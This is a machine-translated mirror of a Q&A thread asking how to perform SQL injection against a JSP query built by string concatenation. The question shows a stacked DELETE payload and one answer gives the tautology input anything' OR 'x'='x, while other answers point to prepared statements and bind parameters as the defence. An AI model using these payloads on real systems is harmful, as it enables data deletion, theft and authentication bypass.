堆栈内存溢出
  简体   繁体   English

Java(或任何其他语言)中的SQL注入指南

[英]SQL Injection Guide In Java (or any other language)

 原文  2012-08-17 06:49:10       java/ sql/ prepared-statement/ sql-injection

问题描述

I have a jsp code which has a query like 我有一个jsp代码,其查询如下 

'select * from MyTable where

Column1='+request.getParameter('q'),

which is executed from a 从一个执行

java.sql.Statement. java.sql.Statement。 Now, provided we can append the query by using the 现在,只要我们可以使用

request parameter, my target is to change the query to something like: 请求参数,我的目标是将查询更改为: 

Select * from MyTable where Column1 = a; Delete from MyTable;

since the original select query is executed through java.sql.Statement, 由于原始的选择查询是通过java.sql.Statement执行的,

how can we do such sql injection ? 我们怎么做这样的SQL注入? If the question is not clear, kindly 如果问题不清楚,请

comment, I'll try to provide further explanations. 评论,我将尝试提供进一步的解释。

3 个解决方案

解决方案1
 2  2012-08-17 07:20:53

SQL Injection Guide: Link1 & Link2 ,but there are so many relevant threads in Stackoverflow regarding SQL Injection like Q & A . SQL注入指南: Link1Link2 ,但是Stackoverflow中有很多与SQL注入相关的线程,例如Q&A

Do one thing,search by -> sql injection java stackoverflow 做一件事,通过-> sql injection java stackoverflow搜索

解决方案2
 1  2012-08-17 06:59:20

if we inject q as a anything' OR 'x'='x then it will select all the column which can be vulnerable. 如果我们将q注入为anything' OR 'x'='x则它将选择所有容易受到攻击的列。 as because variables passed as arguments to prepared statements will automatically be escaped by the JDBC driver 之所以这样,是因为JDBC驱动程序会自动将作为参数传递给准备好的语句的变量自动转义。

Although Prepared Statements helps in defending against SQL Injection, there are possibilities of SQL Injection attacks through inappropriate usage of Prepared Statements. 尽管Prepared Statements有助于防御SQL Injection,但是通过不当使用Prepared Statements可能会发生SQL Injection攻击。 The example below explains such a scenario where the input variables are passed directly into the Prepared Statement and thereby paving way for SQL Injection attacks. 下面的示例说明了这种情况,其中输入变量直接传递到Prepared语句中,从而为SQL Injection攻击铺平了道路。

解决方案3
 0  2016-11-08 15:05:46

Check out this article , which explains how the Statement and PreparedStatement , as well as executeQuery() and executeUpdate() behave when it comes to SQL Injection. 查阅本文 ,其中介绍了SQL注入时StatementPreparedStatement以及executeQuery()executeUpdate()行为。

Apart from the classic DROP tables, there are more scenarios to watch out, like: 除了经典的DROP表之外,还有更多需要注意的场景,例如:

  • call a sleep function so that all your database connections will be busy, therefore making your application unavailable 调用sleep函数,以便所有数据库连接都将繁忙,因此使您的应用程序不可用
  • extracting sensitive data from the DB 从数据库中提取敏感数据
  • bypassing the user authentication 绕过用户认证

And it's not just SQL that can b affected. 不仅SQL会受到影响。 Even JPQL can be compromised if you are not using bind parameters. 如果不使用绑定参数,则即使JPQL也会受到损害。

Bottom line, you should never use string concatenation when building SQL statements. 最重要的是,在构建SQL语句时,绝对不要使用字符串连接。 Use a dedicated API for that purpose: 为此使用专用的API:

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 java或任何其他编程语言有可能吗 - is this possible in java or any other programming language 是否有除Java以外的任何语言在移动设备上无处不在? - Is there any language other than Java that will work as ubiquitous on mobile? Java或任何其他语言:哪个方法/类调用了我的? - Java or any other language: Which method/class invoked mine? 有没有办法将 OpenSCAD 编译器合并到 java 或任何其他编程语言中? - Is there a way to incorporate the OpenSCAD compiler in java or any other programming language? 注释如何在 Java 或任何其他编程语言中内部工作? - How do Annotations works internally in Java or any other programming language? JAVA-可能的SQL注入 - JAVA - Possible SQL Injection Java SQL注入-MySQLSyntaxErrorException - Java SQL Injection - MySQLSyntaxErrorException 防止SQL注入(Java) - Prevent Sql Injection (Java) Java中的SQL注入攻击 - SQL injection Attack in Java 避免SQL注入java - Avoiding SQL injection in java
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM